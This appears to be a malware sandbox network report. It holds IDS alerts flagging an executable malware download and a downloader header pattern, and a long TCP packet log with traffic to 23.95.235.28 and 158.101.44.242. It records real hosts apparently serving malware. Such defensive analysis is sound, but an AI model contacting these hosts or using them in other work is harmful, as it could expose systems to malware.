Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-17T01:19:05.711080+0100 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | 1 | 23.95.235.28 | 80 | 192.168.2.6 | 49695 | TCP
2025-03-17T01:19:05.855949+0100 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | 1 | 23.95.235.28 | 80 | 192.168.2.6 | 49695 | TCP
2025-03-17T01:19:12.426210+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49696 | 158.101.44.242 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 17, 2025 01:19:05.204695940 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.209511042 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.211160898 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.211270094 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.215876102 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706269026 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706298113 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706309080 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706320047 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706334114 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706346989 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706358910 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706365108 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.706370115 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706381083 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706392050 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.706398964 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.706455946 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.706455946 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.711080074 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.711102962 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.711174965 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.711174965 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.711354971 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.711375952 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.711406946 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.711426020 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.727232933 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.727456093 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.794794083 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.794809103 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.794848919 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.794886112 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.794943094 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.794958115 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.794970989 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.794985056 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.794996023 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.795007944 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.795017958 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.795037985 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.795099974 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.795788050 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.795799017 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.795810938 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.795905113 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.795907974 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.795921087 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.795933008 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.796010017 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.796715021 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.796729088 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.796749115 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.796763897 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.796777010 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.796788931 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.796808004 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.796808004 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.796854019 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.796854019 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.797609091 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.797630072 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.797643900 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.797694921 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.797715902 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.797715902 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.797977924 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.855948925 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.855962038 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.856057882 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.883146048 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883160114 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883179903 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883253098 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.883253098 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.883256912 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883269072 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883342981 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.883490086 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883510113 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883522034 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883570910 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.883599997 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883606911 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.883613110 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883626938 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883658886 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883671045 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.883673906 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.883687973 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.883718967 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.883765936 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.884430885 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.884448051 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.884459972 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.884473085 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.884485006 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.884495974 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.884500027 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.884507895 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.884521008 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.884538889 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.884577990 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.884577990 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.885260105 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.885273933 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.885288000 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.885307074 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.885318995 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.885327101 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.885332108 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.885344028 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.885355949 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.885370016 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.885370016 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.885427952 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.885427952 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.886249065 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.886264086 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.886275053 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.886286020 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.886298895 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.886310101 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.886322021 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.886333942 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.886358023 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.886358023 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.886414051 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.887104034 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.887123108 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.887135029 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.887151003 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.887162924 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.887172937 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.887175083 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.887175083 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.887186050 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.887197971 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.887233973 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.887248993 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.887248993 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.888051987 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.888065100 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.888077021 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.888150930 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.888150930 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.971637011 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971659899 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971671104 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971685886 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971698999 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971719027 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971757889 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971762896 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.971762896 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.971779108 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971786022 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.971792936 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971805096 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971822023 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971851110 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.971851110 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.971880913 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.971915960 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971927881 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971940994 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971951962 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.971982956 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.972009897 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.972040892 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972054958 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972070932 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972089052 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972100019 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972111940 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.972112894 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972125053 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972158909 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.972158909 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972158909 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.972172022 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972186089 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972196102 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.972234964 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.972423077 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972434998 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972450018 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972482920 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
Mar 17, 2025 01:19:05.972486019 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.972492933 CET | 49695 | 80 | 192.168.2.6 | 23.95.235.28
Mar 17, 2025 01:19:05.972493887 CET | 80 | 49695 | 23.95.235.28 | 192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972507954 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972549915 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.972584963 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.972707033 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972718954 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972732067 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972743988 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972755909 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972765923 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972769976 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.972778082 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972789049 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972800970 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972809076 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.972815037 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972829103 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.972829103 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.972857952 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.972908020 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.973014116 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973026991 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973037958 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973093033 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.973102093 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973114014 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973124027 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973130941 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.973135948 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973167896 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.973212957 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.973287106 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973298073 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973308086 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973320007 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973330975 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973341942 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973351955 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.973366976 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973378897 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973387003 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.973402023 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973408937 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.973417044 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973428965 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973445892 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.973464966 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.973464966 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.973489046 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.976475954 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976490021 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976501942 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976537943 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.976576090 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.976624966 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976636887 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976649046 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976660967 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976672888 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976684093 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976697922 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.976705074 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976716042 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:05.976732969 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:05.976816893 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.059992075 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060024023 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060038090 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060056925 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060069084 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060081005 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060094118 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060148954 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060159922 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060170889 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060192108 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060199976 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060214043 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060228109 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060235023 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060245991 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060259104 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060275078 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060285091 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060285091 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060296059 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060313940 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060323000 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060326099 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060338020 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060376883 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060445070 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060456991 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060470104 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060486078 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060497999 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060509920 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060522079 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060534000 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060535908 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060573101 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060574055 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060585976 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060601950 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060606003 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.060614109 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060633898 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060646057 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.060659885 CET4969580192.168.2.623.95.235.28
